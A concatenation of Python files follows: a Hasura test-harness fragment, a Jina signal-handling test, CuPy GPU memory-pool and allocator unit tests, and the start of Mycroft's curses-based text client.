self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.ws_client = GQLWsClient(self, '/v1/graphql')
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v1q_f('queries/clear_db.yaml')
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h):
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def v1q(self, q, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + "/v1/query",
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
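# --- Illustrative sketch added by the editor, not part of the original test harness ---
# Minimal standalone exercise of EvtsWebhookServer: bind it to an arbitrary local
# port (5592 here is an assumption), serve it from a background thread, post a fake
# event delivery at it, and read the captured request back from its queue.
if __name__ == '__main__':
    srv = EvtsWebhookServer(('127.0.0.1', 5592))
    srv_thread = threading.Thread(target=srv.serve_forever, daemon=True)
    srv_thread.start()
    requests.post('http://127.0.0.1:5592/some-trigger', json={'event': {'op': 'INSERT'}})
    print(srv.get_event(timeout=5))
    srv.shutdown()
    srv.server_close()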
|
test_runtime_captures_signals.py
|
import multiprocessing
import os
import signal
import time
import pytest
from cli.api import gateway, executor_native
from jina import Executor, DocumentArray, Document, requests
from jina.clients.request import request_generator
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.networking import GrpcConnectionPool
class DummyExecutor(Executor):
def __init__(self, dir=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.dir = dir
self.request_count = 0
@requests
def slow_count(self, **kwargs):
time.sleep(0.5)
self.request_count += 1
def close(self):
super().close()
with open(f'{self.dir}/test.txt', 'w') as fp:
fp.write(f'proper close;{self.request_count}')
def _create_test_data_message():
req = list(
request_generator(
'/', DocumentArray([Document(text='input document') for _ in range(10)])
)
)[0]
return req
@pytest.mark.parametrize('signal', [signal.SIGTERM, signal.SIGINT])
def test_executor_runtimes(signal, tmpdir):
import time
args = set_pod_parser().parse_args([])
def run(args):
args.uses = {
'jtype': 'DummyExecutor',
'with': {'dir': str(tmpdir)},
'metas': {'workspace': str(tmpdir)},
}
executor_native(args)
process = multiprocessing.Process(target=run, args=(args,))
process.start()
time.sleep(0.5)
GrpcConnectionPool.send_request_sync(
_create_test_data_message(), target=f'{args.host}:{args.port_in}'
)
time.sleep(0.1)
os.kill(process.pid, signal)
process.join()
with open(f'{tmpdir}/test.txt', 'r') as fp:
output = fp.read()
split = output.split(';')
assert split[0] == 'proper close'
assert split[1] == '1'
@pytest.mark.parametrize('signal', [signal.SIGTERM, signal.SIGINT])
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_gateway(signal, protocol):
import time
def run():
args = set_gateway_parser().parse_args(
[
'--protocol',
protocol,
'--graph-description',
'{}',
'--deployments-addresses',
'{}',
]
)
gateway(args)
process = multiprocessing.Process(target=run)
process.start()
time.sleep(0.5)
os.kill(process.pid, signal)
process.join()
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
    def __del__(self):
        self.ptr = 0
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ptr = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ptr == self.stream_ptr
assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ptr == self.stream_ptr
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ptr == self.stream_ptr
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ptr == self.stream_ptr
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ptr == self.stream_ptr
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ptr == self.stream_ptr
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ptr == self.stream_ptr
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ptr == self.stream_ptr
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ptr == self.stream_ptr
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
        # do not free split blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
def test_parse_limit_string(self):
parse_limit_string = self.pool._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
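        # Illustrative note (not part of the original tests): these limit
        # strings are the same format accepted via the CUPY_GPU_MEMORY_LIMIT
        # environment variable, e.g. "1073741824" for a 1 GiB cap or "50%"
        # for half of the device memory (assumption based on CuPy's docs).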
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool(self.allocator)
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
def test_zero_size_alloc(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.total_bytes()
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.pool = memory.MemoryPool()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
    def test_allocator_thread_local(self):
        # One Barrier shared by the main and worker threads so the wait()
        # calls below actually synchronize the two allocations.
        barrier = threading.Barrier(2)

        def thread_body(self):
            new_pool = memory.MemoryPool()
            with cupy.cuda.using_allocator(new_pool.malloc):
                assert memory.get_allocator() == new_pool.malloc
                barrier.wait()
                arr = cupy.zeros(128, dtype=cupy.int64)
                barrier.wait()
                assert arr.data.mem.size == new_pool.used_bytes()
                barrier.wait()
            assert memory.get_allocator() == self.pool.malloc

        with cupy.cuda.Device(0):
            t = threading.Thread(target=thread_body, args=(self,))
            t.daemon = True
            t.start()
            barrier.wait()
            assert memory.get_allocator() == self.pool.malloc
            arr = cupy.ones(256, dtype=cupy.int64)
            barrier.wait()
            assert arr.data.mem.size == self.pool.used_bytes()
            barrier.wait()
            t.join()
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
        # Check that arr and the pool have not been released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def test_reuse_between_thread(self):
def job(self):
cupy.arange(16)
self._error = False
# Run in main thread.
self._error = True
job(self)
assert not self._error
# Run in sub thread.
self._error = True
with cupy.cuda.Device(0):
t = threading.Thread(target=job, args=(self,))
t.daemon = True
t.start()
t.join()
assert not self._error
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device(0):
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
import signal
from math import ceil
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars; set it to the system
# default.
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon", "DEBUG"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws
last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
signal.signal(signal.SIGINT, ctrl_c_handler)
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
    If the default locale supports UTF-8, re-encode the string; otherwise
    remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
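# Illustrative example (not part of the original client): under an ASCII-only
# locale, characters outside the 7-bit range are blanked before being handed
# to curses, e.g. handleNonAscii("café") would yield "caf ".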
##############################################################################
# Settings
config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.init(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
log_filters = config["filters"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
